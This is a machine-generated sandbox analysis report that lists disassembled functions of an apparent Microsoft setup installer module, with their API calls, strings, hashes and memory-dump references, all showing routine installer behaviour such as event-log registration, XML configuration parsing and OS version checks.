                                                                                              • API ID: CommandH_prolog3Line_memcpy_s_wcsnlen
                                                                                              • String ID: - available but not verified yet$ - available locally$ - available locally and verified.$ - payload not required for this item to perform action.$ - to be downloaded$ not locally available, but no URL to bedownloaded - error!
                                                                                              • API String ID: 969748958-1544932709
                                                                                              • Opcode ID: f15a5d64650b3eec377a83351dab0a985b50acdeb67acfa69b3a26a4d7f6c0e8
                                                                                              • Instruction ID: 93d4a1577c5e628718ba570ca0f977fc72a6ea756e6f6b7d153c776c1fb24004
                                                                                              • Opcode Fuzzy Hash: f15a5d64650b3eec377a83351dab0a985b50acdeb67acfa69b3a26a4d7f6c0e8
                                                                                              • Instruction Fuzzy Hash: 5C41E431589209AFDF21CFA8C986EDE3BA89F25348F004855F910A7F91C731CA59D7A1
                                                                                              Function 6C8C77AF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,6C8F831D,00000000), ref: 6C8C77E8
                                                                                              • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,6C8F831D,00000000), ref: 6C8C7805
                                                                                                • Part of subcall function 6C8C787B: __EH_prolog3.LIBCMT ref: 6C8C7882
                                                                                                • Part of subcall function 6C8C787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C8C781A,?,6C8F831D,00000000), ref: 6C8C78B2
                                                                                                • Part of subcall function 6C8C787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C8F831D,00000000), ref: 6C8C78D8
                                                                                                • Part of subcall function 6C8C787B: RegCloseKey.ADVAPI32(?,?,6C8F831D,00000000), ref: 6C8C78E4
                                                                                                • Part of subcall function 6C8C787B: GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C78F9
                                                                                              • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,6C8F831D,00000000), ref: 6C8C7836
                                                                                              • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,6C8F831D,00000000), ref: 6C8C7859
                                                                                              • RegCloseKey.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C7861
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                                                              • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                                                              • API String ID: 4021642227-369282485
                                                                                              • Opcode ID: be10560ae8f542cb7fa434c7f23941c0a60caf6d67f2614aea390a7f7965fc34
                                                                                              • Instruction ID: ec734f9d5f9e147a6adc64c8fa9fa319a0f83cf8d8142b8664b0ac180f593028
                                                                                              • Opcode Fuzzy Hash: be10560ae8f542cb7fa434c7f23941c0a60caf6d67f2614aea390a7f7965fc34
                                                                                              • Instruction Fuzzy Hash: 0711C87174123CBAEB309B529C8DFEBBF7DEF51B58F0004A5B61CA2140C6709E44DAA0
                                                                                              Function 6C8CB31F Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CB326
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CB25F: __EH_prolog3.LIBCMT ref: 6C8CB266
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CB5A8
                                                                                              Strings
                                                                                              • No DisabledCommandLineSwitches block was specified, xrefs: 6C8CB5C8
                                                                                              • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 6C8CB546
                                                                                              • ParameterInfo.xml, xrefs: 6C8CB554
                                                                                              • DisabledCommandLineSwitches, xrefs: 6C8CB353
                                                                                              • Disabled CommandLineSwitch added: , xrefs: 6C8CB406, 6C8CB4C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                                                              • API String ID: 2489616738-1449725936
                                                                                              • Opcode ID: 9e35677885ed0f63e747aa0882b712fb548b50aa2379fe61d03a2eae5a307972
                                                                                              • Instruction ID: c00210b1c94a8b9b828470ff687f7077c264fd97bf8f5019b3f2c252c488d67f
                                                                                              • Opcode Fuzzy Hash: 9e35677885ed0f63e747aa0882b712fb548b50aa2379fe61d03a2eae5a307972
                                                                                              • Instruction Fuzzy Hash: 3BA17C70A00609DFCB10CFA8CA84AEEBBB5BF95308F244959E021EB790C735DE05CB61
                                                                                              Function 6C91537A Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C915381
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C9268B5: PMDtoOffset.LIBCMT ref: 6C926989
                                                                                                • Part of subcall function 6C9268B5: std::bad_exception::bad_exception.LIBCMT ref: 6C9269B3
                                                                                                • Part of subcall function 6C9268B5: __CxxThrowException@8.LIBCMT ref: 6C9269C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8OffsetThrowstd::bad_exception::bad_exception
                                                                                              • String ID: - authored action for this item is NoOp$ - no products affected by this item. Not Applicable. $ - not applicable $ of $Determining state$nameless item
                                                                                              • API String ID: 3118957153-195430493
                                                                                              • Opcode ID: e291cafe8c5e7e358719469006a2fcb9cc24bf337dd4575fa67f5eed003379ae
                                                                                              • Instruction ID: bf3e8782b7dfb6d96fe8005df4bc57e1fec932088073fbf52bc775d36bc552be
                                                                                              • Opcode Fuzzy Hash: e291cafe8c5e7e358719469006a2fcb9cc24bf337dd4575fa67f5eed003379ae
                                                                                              • Instruction Fuzzy Hash: CE61CB7290411CAFCF20DFA8CD05AEE7BB9AF25358F154920E424B7B91C730DA19D7A1
                                                                                              Function 6C8E9048 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D2E48: __EH_prolog3.LIBCMT ref: 6C8D2E4F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E91B1
                                                                                              Strings
                                                                                              • Global Block Checks, xrefs: 6C8E9087, 6C8E90B7
                                                                                              • : SuccessBlockers evaluated to true., xrefs: 6C8E91E8
                                                                                              • : StopBlockers evaluated to true., xrefs: 6C8E9209
                                                                                              • no blocking conditions found, xrefs: 6C8E9078
                                                                                              • Checking for global blockers, xrefs: 6C8E90A8
                                                                                              • : WarnBlockers evaluated to true., xrefs: 6C8E921D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                                                              • API String ID: 2489616738-2937627051
                                                                                              • Opcode ID: 2617c12631a53d82eafb6b339ac8b7620b2c778a0a5f0c435c748f8add0fa2b2
                                                                                              • Instruction ID: 871c69607788d8e20be1d7112af3b9f90023aa60ac9c48abf7f9594fdc6e44f1
                                                                                              • Opcode Fuzzy Hash: 2617c12631a53d82eafb6b339ac8b7620b2c778a0a5f0c435c748f8add0fa2b2
                                                                                              • Instruction Fuzzy Hash: EC7157B1408345AFC720CF59C984A8BBBE8BB89318F404E2EF59983B50D375E949CB52
                                                                                              Function 6C8CB00D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CB014
                                                                                                • Part of subcall function 6C8F91AF: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,6C8CB029,?,0000002C,6C90D55B,?,?,?,?,00000001), ref: 6C8F91C5
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CB044
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CB128
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CB163
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              Strings
                                                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C8CB0F6
                                                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C8CB033
                                                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C8CB1CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                              • API String ID: 1763430278-2525052916
                                                                                              • Opcode ID: 5af1b5e37119ee2673f31efabaa3fd9c5ffc738fbf5283ec9adf9987f1765dda
                                                                                              • Instruction ID: 232350a7c734256c7cd87445a274466c9f6e5e107f2d66c12f75777b1d55a22c
                                                                                              • Opcode Fuzzy Hash: 5af1b5e37119ee2673f31efabaa3fd9c5ffc738fbf5283ec9adf9987f1765dda
                                                                                              • Instruction Fuzzy Hash: 90519071900109EFCB10DFE8C984DEEBBB8AF15318F14496AE111A7B50DB34DA49CBA2
                                                                                              Function 6C902C16 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8C8168: GetFileSize.KERNEL32(?,?,?,?,?,6C8F3B9F,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?), ref: 6C8C8178
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 6C902CA8
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C902CE7
                                                                                              • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C902D19
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 6C902D32
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                                                              • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                                                              • API String ID: 1055460099-1824744887
                                                                                              • Opcode ID: 352039266fb0339acc5a1009101d9021ac2280a1a925f21db1e9bb951ac39fcb
                                                                                              • Instruction ID: dda16217e4408f2bee8d06dda5b49f952cbd15f07dac34bbd0a3837df2cdb4eb
                                                                                              • Opcode Fuzzy Hash: 352039266fb0339acc5a1009101d9021ac2280a1a925f21db1e9bb951ac39fcb
                                                                                              • Instruction Fuzzy Hash: 76515C712087459FCB20DF68C944A9FBBE9BF99358F400E2EF1A497A90D734D609CB52
                                                                                              Function 6C8F4E70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 141fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F4E77
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C5FCE: __EH_prolog3.LIBCMT ref: 6C8C5FD5
                                                                                                • Part of subcall function 6C8C5FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C8C6018
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F4F68
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C8F4F7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C8F4FA1
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                                • Part of subcall function 6C8CA3BC: __EH_prolog3.LIBCMT ref: 6C8CA3C3
                                                                                              Strings
                                                                                              • ParameterInfo.xml, xrefs: 6C8F4FE5
                                                                                              • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 6C8F4FCC
                                                                                              • File %s could not be opened for read, xrefs: 6C8F4F0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CloseDispatcherExceptionException@8FileHandlePathReadRelativeThrowUser
                                                                                              • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                                                              • API String ID: 682709548-652212332
                                                                                              • Opcode ID: 8eb08dfa3e3e0834bb8edb3eee15f7505127bd79fe2204886cf0537561f083be
                                                                                              • Instruction ID: 2dcc7b41f7a88c838215906791cd01b2f333a65d9b202aa2bcaaaa1f8025bb42
                                                                                              • Opcode Fuzzy Hash: 8eb08dfa3e3e0834bb8edb3eee15f7505127bd79fe2204886cf0537561f083be
                                                                                              • Instruction Fuzzy Hash: 8F516B71900209EFDF21DFE8CA44ADEBBB9AF14318F14856AE114B7B90D730DA09CB61
                                                                                              Function 6C8F7F6A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F7F74
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • _memset.LIBCMT ref: 6C8F7FD4
                                                                                              • GetVersionExW.KERNEL32 ref: 6C8F7FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3H_prolog3_Version_memset
                                                                                              • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                                                              • API String ID: 3727276431-2914782974
                                                                                              • Opcode ID: df75388b6e7b1c6847ad6a5ac785f183fbe96bfd89877a470e2ad44d14664363
                                                                                              • Instruction ID: 94d183ec2ee44d6aaeb8b6416b835d5ab979a15c21e9709d378ad707191eb5f3
                                                                                              • Opcode Fuzzy Hash: df75388b6e7b1c6847ad6a5ac785f183fbe96bfd89877a470e2ad44d14664363
                                                                                              • Instruction Fuzzy Hash: 8B4159319001189BCB20DBA8CD45FCDB7B9AF19308F4449E5E148ABA90DB70EB99CB91
                                                                                              Function 6C8C95C1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C95C8
                                                                                              • VariantInit.OLEAUT32(?), ref: 6C8C95DB
                                                                                              • VariantClear.OLEAUT32(00000008), ref: 6C8C962E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8C960E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C8C9651
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8C96F8
                                                                                              Strings
                                                                                              • schema validation error: attribute not found - , xrefs: 6C8C9676
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                                                              • String ID: schema validation error: attribute not found -
                                                                                              • API String ID: 8365360-3489740836
                                                                                              • Opcode ID: 51e156fe4ae9d8c4085ff978898313fb6fa028abce0cf328b087925ea8d6992c
                                                                                              • Instruction ID: 5592b4f342f212de754e5bcabc72a3d405ccdffd5dbe1ef92f0a3f427e6d4816
                                                                                              • Opcode Fuzzy Hash: 51e156fe4ae9d8c4085ff978898313fb6fa028abce0cf328b087925ea8d6992c
                                                                                              • Instruction Fuzzy Hash: 23415E71900249EFCB10DFE4C984EDEBB75BF15318F144AA9E425A7B80C734DA48CB61
                                                                                              Function 6C90374B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903752
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8CC259: __EH_prolog3.LIBCMT ref: 6C8CC260
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C8FFA6E,0000000C,6C903A05,?,6C8BA794,?), ref: 6C9037B7
                                                                                              • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 6C903846
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              Strings
                                                                                              • SetupResources.dll missing from %d directory, xrefs: 6C9037BE
                                                                                              • LocalizedData.xml, xrefs: 6C903835
                                                                                              • LocalizedData.xml missing from %d directory, xrefs: 6C90384D
                                                                                              • SetupResources.dll, xrefs: 6C9037A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                                                              • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                                                              • API String ID: 3590062302-1245617268
                                                                                              • Opcode ID: 49844db2a5ecd67de3213de9afe3e8de17c1e34280629cecba9cb8e19bdc578e
                                                                                              • Instruction ID: 8e36d880ffea78f24e0969183d3aa2c239699b5276bb6678284e8e3fcbda215f
                                                                                              • Opcode Fuzzy Hash: 49844db2a5ecd67de3213de9afe3e8de17c1e34280629cecba9cb8e19bdc578e
                                                                                              • Instruction Fuzzy Hash: 3231B171904109EFDF20DBB8CD42ADE77B4BF21328F144A65E424EBB95C730DA189BA5
                                                                                              Function 6C90101A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C901021
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CC406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC426
                                                                                                • Part of subcall function 6C8CC406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C900F4A,00000004,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC43F
                                                                                                • Part of subcall function 6C8CC406: RegCloseKey.KERNEL32(?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02F92298,00000004,6C900F4A,?), ref: 6C8CC44E
                                                                                              • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C8FA58E,?,6C8BA794,?,02F92298,?,00000000,?), ref: 6C901092
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C8FA58E,?,6C8BA794,?), ref: 6C9010F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
